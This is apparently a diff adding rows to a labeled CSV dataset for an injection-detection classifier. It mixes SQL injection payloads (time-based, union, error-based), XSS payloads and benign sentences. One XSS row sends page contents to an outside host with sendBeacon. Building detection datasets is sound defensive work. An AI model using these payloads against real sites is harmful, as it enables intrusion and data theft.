+ "select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) ) ||'",2,SQLi,723
725
+ 0 or 1 = 1,2,SQLi,724
726
+ "1 ) as qjbd where 2808 = 2808 ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) --",2,SQLi,725
727
+ "1"" ) where 5065 = 5065",2,SQLi,726
728
+ "<caption onmouseup=""alert(1)"">test</caption>",1,XSS,727
729
+ "<XML ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:document.vulnerable=true""></B></I></XML><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></span>",1,XSS,728
730
+ <pre id=x tabindex=1 onbeforedeactivate=alert(1)></pre><input autofocus>,1,XSS,729
731
+ "-6463"" ) ) ) union all select 3280,3280,3280,3280,3280,3280,3280,3280,3280#",2,SQLi,730
732
+ Stone apologized but said he did not select the image himself.,3,normal,731
733
+ "<hr onmouseenter=""alert(1)"">test</hr>",1,XSS,732
734
+ "1' and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )",2,SQLi,733
735
+ <script>d.innerHTML+='';</script>,1,XSS,734
736
+ "1 ) ) union all select null,null,null,null,null,null,null--",2,SQLi,735
737
+ 1 ) as selm where 5759 = 5759,2,SQLi,736
738
+ "<textarea draggable=""true"" ondragleave=""alert(1)"">test</textarea>",1,XSS,737
739
+ Pete Najarian had his eye the Energy Select Sector SPDR ETF.,3,normal,738
740
+ "1' ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )",2,SQLi,739
741
+ 1' and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and 'zoin' = 'zoin,2,SQLi,740
742
+ "The legislative bodies are the select and common council, elected under the law of 1887; by a three-fifths vote it may pass resolutions or ordinances over the mayor's veto.",3,normal,741
743
+ 1'|| ( select 'aojt' from dual where 8499 = 8499,2,SQLi,742
744
+ select ( case when ( 4719 = 8852 ) then 1 else 4719* ( select 4719 from master..sysdatabases ) end ) --,2,SQLi,743
745
+ "-4121%"" ) union all select 2659,2659,2659,2659,2659,2659,2659,2659--",2,SQLi,744
746
+ <option onfocusout=alert(1) tabindex=1 id=x></option><input autofocus>,1,XSS,745
747
+ <head id=x tabindex=1 onfocus=alert(1)></head>,1,XSS,746
748
+ "<;BR SIZE="";&;{alert(';XSS';)}"";>;",1,XSS,747
749
+ "<td draggable=""true"" ondragleave=""alert(1)"">test</td>",1,XSS,748
750
+ -2820' ) ) or 6679 = 8848--,2,SQLi,749
751
+ -6764' ) or 2314 = 2017--,2,SQLi,750
752
+ "1'|| ( select 'eils' where 8308 = 8308 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,751
753
+ ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 5877 = 5877 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ),2,SQLi,752
754
+ "-8950"" ) ) as uahs where 2113 = 2113 union all select 2113,2113,2113,2113,2113,2113,2113,2113,2113,2113#",2,SQLi,753
755
+ "<style>:target {transform: rotate(180deg);}</style><aside id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></aside>",1,XSS,754
756
+ "select * from users where id = 1 or \<1 union select 1,@@VERSION -- 1",2,SQLi,755
757
+ <dl onpointerdown=alert(1)>XSS</dl>,1,XSS,756
758
+ "1%"" ) ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( ( ""%"" = """,2,SQLi,757
759
+ """)))) waitfor delay '0:0:20' --",2,SQLi,758
760
+ """,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,759
761
+ "-8982' in boolean mode ) union all select 5367,5367,5367,5367,5367,5367#",2,SQLi,760
762
+ <template id=x tabindex=1 onfocusin=alert(1)></template>,1,XSS,761
763
+ "select * from users where id = 1 or "".,"" or 1 = 1 -- 1",2,SQLi,762
764
+ "<style>:target {color:red;}</style><nobr id=x style=""transition:color 1s"" ontransitionend=alert(1)></nobr>",1,XSS,763
765
+ 1' where 3362 = 3362,2,SQLi,764
766
+ "select sleep ( 5 ) and ""jvys"" like ""jvys",2,SQLi,765
767
+ "<image onmouseleave=""alert(1)"">test</image>",1,XSS,766
768
+ "<set attributeName=""onmouseover"" to=""alert(89)""/>",1,XSS,767
769
+ "1"" ) ) and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,768
770
+ "-8588' union all select 2135,2135--",2,SQLi,769
771
+ "iif ( 8770 = 9611,1,1/0 )",2,SQLi,770
772
+ <template onpointerdown=alert(1)>XSS</template>,1,XSS,771
773
+ "1"" where 5406 = 5406 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) --",2,SQLi,772
774
+ "<div draggable=""true"" contenteditable>drag me</div><table ondrop=alert(1) contenteditable>drop here</table>",1,XSS,773
775
+ <center onpointerleave=alert(1)>XSS</center>,1,XSS,774
776
+ Where's the beauty salon?,3,normal,775
777
+ 1 ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ),2,SQLi,776
778
+ "<svg onbeforecopy=""alert(1)"" contenteditable>test</svg>",1,XSS,777
779
+ "<u onmouseout=""alert(1)"">test</u>",1,XSS,778
780
+ "1'|| ( select 'dukt' where 3206 = 3206 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) ) ||'",2,SQLi,779
781
+ <caption onpointerleave=alert(1)>XSS</caption>,1,XSS,780
782
+ <rp id=x tabindex=1 onbeforeactivate=alert(1)></rp>,1,XSS,781
783
+ 1 where 6827 = 6827,2,SQLi,782
784
+ "select * from users where id = 1 or ""$ ( "" or 1 = 1 -- 1",2,SQLi,783
785
+ "1 ) ) union all select null,null,null,null,null#",2,SQLi,784
786
+ "1"" ) as fcrx where 2929 = 2929 and 2820 = 5133",2,SQLi,785
787
+ "<div id=""122""><iframe sandbox=""allow-same-origin allow-forms allow-scripts"" src=""http://example.org/""></iframe>//[""'`-->]]>]</div>",1,XSS,786
788
+ "1' where 8969 = 8969 union all select null,null,null,null,null--",2,SQLi,787
789
+ "The House Select Committee on Benghazi, chaired by South Carolina Rep.",3,normal,788
790
+ "<frameset onScroll frameset onScroll=""javascript:javascript:alert(1)""></frameset onScroll>",1,XSS,789
791
+ "1 ) where 7775 = 7775 union all select null,null,null,null--",2,SQLi,790
792
+ or 1=1#,2,SQLi,791
793
+ "1"" ) where 5719 = 5719 rlike sleep ( 5 ) --",2,SQLi,792
794
+ ( select * from ( select ( sleep ( 5 ) ) ) srmq ) # gkkx,2,SQLi,793
795
+ "1 ) ) as wufr where 5239 = 5239 or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,794
796
+ "<dt onmouseout=""alert(1)"">test</dt>",1,XSS,795
797
+ <svg><pre onload=alert(1)></pre>,1,XSS,796
798
+ "<button draggable=""true"" ondragend=""alert(1)"">test</button>",1,XSS,797
799
+ AND 1083=1083 AND ('1427=1427,2,SQLi,798
800
+ <xmp onpointerup=alert(1)>XSS</xmp>,1,XSS,799
801
+ 1'+ ( select 'stsu' where 2386 = 2386 or sleep ( 5 ) #,2,SQLi,800
802
+ "<i onbeforecut=""alert(1)"" contenteditable>test</i>",1,XSS,801
803
+ "<rb draggable=""true"" ondragend=""alert(1)"">test</rb>",1,XSS,802
804
+ "<div style=""list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));"">X",1,XSS,803
805
+ ( 1589 = 1589 ) *1,2,SQLi,804
806
+ "1"" ) where 5850 = 5850 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) --",2,SQLi,805
807
+ <svg><address onload=alert(1)></address>,1,XSS,806
808
+ ") AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND (1337=1337",2,SQLi,807
809
+ "<details oncopy=""alert(1)"" contenteditable>test</details>",1,XSS,808
810
+ "<link onmouseup=""alert(1)"">test</link>",1,XSS,809
811
+ "<content onclick=""alert(1)"">test</content>",1,XSS,810
812
+ "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ( ( 'squj' = 'squj",2,SQLi,811
813
+ "-8205' or elt ( 6581 = 3480,3480 ) and 'sosv' = 'sosv",2,SQLi,812
814
+ "<aside oncopy=""alert(1)"" contenteditable>test</aside>",1,XSS,813
815
+ "( select * from generate_series ( 3906,3906,case when ( 3906 = 3906 ) then 1 else 0 end ) limit 1 )",2,SQLi,814
816
+ You can also select the same option the dropdown menu.,3,normal,815
817
+ <IMG SRC=�jav ascript:alert(�XSS�);�>,1,XSS,816
818
+ "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( USERNAME ) FROM ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS ) WHERE LIMIT = 4 ) ) AND 'i' = 'i",2,SQLi,817
819
+ "1' ) where 2121 = 2121 or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,818
820
+ "1%' and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,819
821
+ "<image onmouseenter=""alert(1)"">test</image>",1,XSS,820
822
+ He selected a restaurant to celebrate his birthday.,3,normal,821
823
+ waitfor delay '0:0:5' and 'fjpf' like 'fjpf,2,SQLi,822
824
+ "-5596' ) ) ) union all select 4877,4877,4877,4877,4877,4877,4877,4877,4877,4877--",2,SQLi,823
825
+ "1"" ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ""ponv"" = ""ponv",2,SQLi,824
826
+ "<noembed draggable=""true"" ondragleave=""alert(1)"">test</noembed>",1,XSS,825
827
+ "( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6130 = 6130,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) )",2,SQLi,826
828
+ "-2953"" ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ""oaeh"" = ""oaeh",2,SQLi,827
829
+ 1' ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( 'mmow' = 'mmow,2,SQLi,828
830
+ "-6581'|| ( select 'hpjd' where 7608 = 7608 union all select 7608,7608,7608,7608,7608,7608,7608,7608#",2,SQLi,829
831
+ "Why, he might ask, should he not select the simple form of Dollond's first type ?",3,normal,830
832
+ "Open Photoshop CC 2020 and select ""Open"" and then select the file you want to flip.",3,normal,831
833
+ <aside id=x tabindex=1 onfocusin=alert(1)></aside>,1,XSS,832
834
+ "<acronym onmouseenter=""alert(1)"">test</acronym>",1,XSS,833
835
+ -1277' ) ) ) order by 1--,2,SQLi,834
836
+ "<xmp onmouseleave=""alert(1)"">test</xmp>",1,XSS,835
837
+ "1%"" ) ) ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( ( ""%"" = """,2,SQLi,836
838
+ "<select onmouseleave=""alert(1)"">test</select>",1,XSS,837
839
+ "1"" ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ""ypoj"" = ""ypoj",2,SQLi,838
840
+ 1%' and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and '%' = ',2,SQLi,839
841
+ "-6184"" ) ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ""rovr"" = ""rovr",2,SQLi,840
842
+ "1"" ) ) as eagr where 3366 = 3366 and elt ( 4249 = 4249,7259 ) --",2,SQLi,841
843
+ "If large images still look jagged, click Tools within Internet Explorer, select Internet Options and click the Advanced tab.",3,normal,842
844
+ <textarea autofocus onfocusin=alert(1)>test</textarea>,1,XSS,843
845
+ "1' ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( 'cbwx' = 'cbwx",2,SQLi,844
846
+ "<? '=""foo""><x foo='><img src=x onerror=alert(3)//'>//[""'`-->]]>]</div>",1,XSS,845
847
+ select ( case when ( 5740 = 7636 ) then 5740 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,846
848
+ "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22",2,SQLi,847
849
+ <frameset onload=alert(123)>,1,XSS,848
850
+ -2210' or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and 'myvr' like 'myvr,2,SQLi,849
851
+ ORDER BY 16--,2,SQLi,850
852
+ <optgroup onpointerout=alert(1)>XSS</optgroup>,1,XSS,851
853
+ "<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://www.securitycompass.com/xss.htc""><xss:xss>XSS</xss:xss></html>",1,XSS,852
854
+ "Grab a picture from your camera roll (or click one from the Facebook Camera), tap the sticker icon, select the music sticker, and select the song you want to add.",3,normal,853
855
+ "select * from generate_series ( 7237,7237,case when ( 7237 = 9757 ) then 1 else 0 end ) limit 1--",2,SQLi,854
856
+ Select brandy.,3,normal,855
857
+ "<col draggable=""true"" ondragenter=""alert(1)"">test</col>",1,XSS,856
858
+ "1' in boolean mode ) union all select null,null,null#",2,SQLi,857
859
+ "1'|| ( select 'alxi' where 3967 = 3967 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,858
860
+ 1' and ( select * from ( select ( sleep ( 5 ) ) ) fzno ),2,SQLi,859
861
+ 1' ) ) as fbjd where 8597 = 8597,2,SQLi,860
862
+ "<button onkeypress=""alert(1)"" contenteditable>test</button>",1,XSS,861
863
+ "<code oncontextmenu=""alert(1)"">test</code>",1,XSS,862
864
+ "1"" ) or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,863
865
+ -6540' ) where 5019 = 5019 or ( 8459 = 8459 ) *4906--,2,SQLi,864
866
+ ") and 0=benchmark(3000000,MD5(1))%20%23",2,SQLi,865
867
+ Let's decide where to go for a hike.,3,normal,866
868
+ "-9659 ) ) ) union all select 8665,8665,8665,8665,8665,8665,8665--",2,SQLi,867
869
+ <object onpointerleave=alert(1)>XSS</object>,1,XSS,868
870
+ "1%' and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,869
871
+ Search records where relevant.,3,normal,870
872
+ "waitfor delay '0:0:5' and ( ( ""ykgm"" = ""ykgm",2,SQLi,871
873
+ "On the top right, select the cog wheel (""Settings"") and then select ""Settings"" from the drop down menu.",3,normal,872
874
+ "<aside onkeypress=""alert(1)"" contenteditable>test</aside>",1,XSS,873
875
+ <noframes onpointerover=alert(1)>XSS</noframes>,1,XSS,874
876
+ if ( 5316 = 4416 ) select 5316 else drop function vtve--,2,SQLi,875
877
+ "echo('IPT&gt;alert(\""XSS\"")&lt;/SCRIPT&gt;'); ?&gt;",1,XSS,876
878
+ "From there, select Language and Input and then On-screen Keyboard.",3,normal,877
879
+ <var onpointerenter=alert(1)>XSS</var>,1,XSS,878
880
+ "<area onmouseout=""alert(1)"">test</area>",1,XSS,879
881
+ <samp id=x tabindex=1 ondeactivate=alert(1)></samp><input id=y autofocus>,1,XSS,880
882
+ select * from users where id = '1' + $+%\ or 1 = 1 -- 1',2,SQLi,881
883
+ 1 and 4595 = 4595#,2,SQLi,882
884
+ "<li onkeyup=""alert(1)"" contenteditable>test</li>",1,XSS,883
885
+ "<svg onmousedown=""alert(1)"">test</svg>",1,XSS,884
886
+ "{""id"":null,""name"":""dream""}",3,normal,885
887
+ 1' ) rlike ( select ( case when ( 2671 = 4485 ) then 1 else 0x28 end ) ) and ( 'ezco' like 'ezco,2,SQLi,886
888
+ "{""id"":null,""name"":""Wormmon""}",3,normal,887
889
+ I'll select my tuxedo.,3,normal,888
890
+ "1"" ) ) or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( ""nobt"" = ""nobt",2,SQLi,889
891
+ "1"" ) ) ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( ( ""hkjm"" like ""hkjm",2,SQLi,890
892
+ 1'|| ( select 'xemx' from dual where 4683 = 4683 or sleep ( 5 ) #,2,SQLi,891
893
+ "1' procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and 'tuzl' = 'tuzl",2,SQLi,892
894
+ "<body onbeforeunload=navigator.sendBeacon('//https://ssl.portswigger-labs.net/',document.body.innerHTML)>",1,XSS,893
895
+ <template onfocusout=alert(1) tabindex=1 id=x></template><input autofocus>,1,XSS,894
896
+ "<mark onkeypress=""alert(1)"" contenteditable>test</mark>",1,XSS,895
897
+ -4803%' ) ) or 8571 = 8571--,2,SQLi,896
898
+ 1' and 7528 = 2894 and 'qoyw' = 'qoyw,2,SQLi,897
899
+ "1"" ) as aifd where 5962 = 5962",2,SQLi,898
900
+ "-8651"" ) where 8391 = 8391 union all select 8391,8391#",2,SQLi,899
901
+ <rp onblur=alert(1) tabindex=1 id=x></rp><input autofocus>,1,XSS,900
902
+ "Guys seriously start realizing league of legends is a TEAMGAME and it starts in champ selection, even in SoloQueue.. . Talking about the hovered picks and teamcomps is not toxic, not uncalled for & not stupid, and you cant say ""let him play what he wants or dodge"" cuz thats stupid",3,normal,901
903
+ "1%' and elt ( 4249 = 4249,7259 ) and '%' = '",2,SQLi,902
904
+ "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3#",2,SQLi,903
905
+ <iframe onfocusout=alert(1) id=x><input autofocus>,1,XSS,904
906
+ "1 where 4477 = 4477 union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,905
907
+ 1%' ) ) and sleep ( 5 ) #,2,SQLi,906
908
+ declare,3,normal,907
909
+ "select * from users where id = '1'<@.. union select 1,version ( ) -- 1'",2,SQLi,908
910
+ 1 ) ) ) union all select null--,2,SQLi,909
911
+ Select love.,3,normal,910
912
+ "<script> var contentType = 1; alert(1); var title = ""This is a regular title""; … //some user agreement and sending to server logic might be here … </script>",1,XSS,911
913
+ "1%' ) ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( '%' = '",2,SQLi,912
914
+ Modify style.,3,normal,913
915
+ "1"" ) as ffon where 2738 = 2738 and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --",2,SQLi,914
916
+ 1'|| ( select 'fjlg' from dual where 9517 = 9517,2,SQLi,915
917
+ "1' ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( 'ylit' like 'ylit",2,SQLi,916
918
+ "<spacer oncut=""alert(1)"" contenteditable>test</spacer>",1,XSS,917
919
+ <article onpointerout=alert(1)>XSS</article>,1,XSS,918
920
+ "<span draggable=""true"" ondragend=""alert(1)"">test</span>",1,XSS,919
921
+ &lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;,1,XSS,920
922
+ "1' or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,921
923
+ <sub onfocusout=alert(1) tabindex=1 id=x></sub><input autofocus>,1,XSS,922
924
+ "{""id"":null,""firstName"":""Milky"",""lastName"":""Teo"",""address"":""1207 NETWORK CENTRE DR, EFFINGHAM IL 62401"",""city"":""316"",""telephone"":""870815848""}",3,normal,923
925
+ I'm thinking of where to have a quiet getaway.,3,normal,924
926
+ "{""id"":null,""name"":""student having""}",3,normal,925
927
+ "<a href=""javas\x0Ccript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,926
928
+ <details onpointerleave=alert(1)>XSS</details>,1,XSS,927
929
+ "1 ) as asmt where 4986 = 4986 union all select null,null#",2,SQLi,928
930
+ "1' ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )",2,SQLi,929
931
+ "<object onkeydown=""alert(1)"" contenteditable>test</object>",1,XSS,930
932
+ "1"" ) where 5870 = 5870 union all select null,null,null--",2,SQLi,931
933
+ 1' in boolean mode ) rlike sleep ( 5 ) #,2,SQLi,932
934
+ "rock mag select, which they did not.",3,normal,933
935
+ 1 ) rlike ( select ( case when ( 5477 = 7492 ) then 1 else 0x28 end ) ) and ( 4427 = 4427,2,SQLi,934
936
+ "1%"" waitfor delay '0:0:5'--",2,SQLi,935
937
+ "1"" where 1982 = 1982",2,SQLi,936
938
+ Why did you select the article and performer you did?,3,normal,937
939
+ Select find.,3,normal,938
940
+ 1' and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and 'psdl' like 'psdl,2,SQLi,939
941
+ 1' ) ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ( ( 'yqbo' = 'yqbo,2,SQLi,940
942
+ "<br onbeforecopy=""alert(1)"" contenteditable>test</br>",1,XSS,941
943
+ Select your dream engagement ring.,3,normal,942
944
+ <img src=``&NewLine; onerror=alert(1)&NewLine;,1,XSS,943
945
+ "<hgroup ondblclick=""alert(1)"">test</hgroup>",1,XSS,944
946
+ "1"" ) ) ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,945
947
+ "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5--",2,SQLi,946
948
+ "1' and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and 'pbin' = 'pbin",2,SQLi,947
949
+ <%<!--'%><script>alert(1);</script -->,1,XSS,948
950
+ "<;IMG STYLE="";xss:expr/*XSS*/ession(alert(';XSS';))"";>;",1,XSS,949
951
+ `'><script>\xE2\x80\xA8javascript:alert(512)</script>,1,XSS,950
952
+ "1"" ) ) ) rlike ( select ( case when ( 6915 = 4531 ) then 1 else 0x28 end ) ) and ( ( ( ""jzzu"" = ""jzzu",2,SQLi,951
953
+ "1"" ) as rovd where 3764 = 3764 and elt ( 4249 = 4249,7259 ) --",2,SQLi,952
954
+ 1 ) as kaew where 2658 = 2658,2,SQLi,953
955
+ Select that and the driver will know what to do.,3,normal,954
956
+ "1' in boolean mode ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) #",2,SQLi,955
957
+ 1' ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( 'sgdj' like 'sgdj,2,SQLi,956
958
+ Select your dream project.,3,normal,957
959
+ <svg onpointerleave=alert(1)>XSS</svg>,1,XSS,958
960
+ "{""id"":null,""name"":""Birdramon""}",3,normal,959
961
+ 1 ) ) as ojjk where 3687 = 3687 and ( 4833 = 9218 ) *9218--,2,SQLi,960
962
+ 1' ) and ( 2763 = 4004 ) *4004 and ( 'dtts' = 'dtts,2,SQLi,961
963
+ 1'|| ( select 'abjv' from dual where 4200 = 4200,2,SQLi,962
964
+ "1"" and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ""icow"" like ""icow",2,SQLi,963
965
+ "<style>@keyframes slidein {}</style><aside style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></aside>",1,XSS,964
966
+ `'><script>\xE2\x80\x80javascript:alert(530)</script>,1,XSS,965
967
+ "><h1><IFRAME width=""420"" height=""315"" frameborder=""0"" onmouseover=""document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr",1,XSS,966
968
+ Select trip.,3,normal,967
969
+ "&lt;XML SRC=\""xsstest&#46;xml\"" ID=I&gt;&lt;/XML&gt;",1,XSS,968
970
+ select * from users where id = '1' *$ . or 1 = 1 -- 1',2,SQLi,969
971
+ "At this point, they've all deployed it in some form or another, although it's mostly been in select locations and with select technologies.",3,normal,970
972
+ 1%' ) ) ) and sleep ( 5 ) and ( ( ( '%' = ',2,SQLi,971
973
+ 1' ) rlike sleep ( 5 ) and ( 'boto' = 'boto,2,SQLi,972
974
+ Select your fight.,3,normal,973
975
+ "<span draggable=""true"" ondrag=""alert(1)"">test</span>",1,XSS,974
976
+ Delete old bookmarks.,3,normal,975
977
+ "<th oncopy=""alert(1)"" contenteditable>test</th>",1,XSS,976
978
+ 1' ) ) and sleep ( 5 ) and ( ( 'tcwt' = 'tcwt,2,SQLi,977
979
+ "<rb onclick=""alert(1)"">test</rb>",1,XSS,978
980
+ "ABC<div style=""x:\xE2\x80\x87expression(javascript:alert(1)"">DEF",1,XSS,979
981
+ "{""id"":null,""name"":""Mastemon""}",3,normal,980
982
+ "1 where 2278 = 2278 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",2,SQLi,981
983
+ Delete the data.,3,normal,982
984
+ 1 ) where 9552 = 9552 and 1961 = 6333--,2,SQLi,983
985
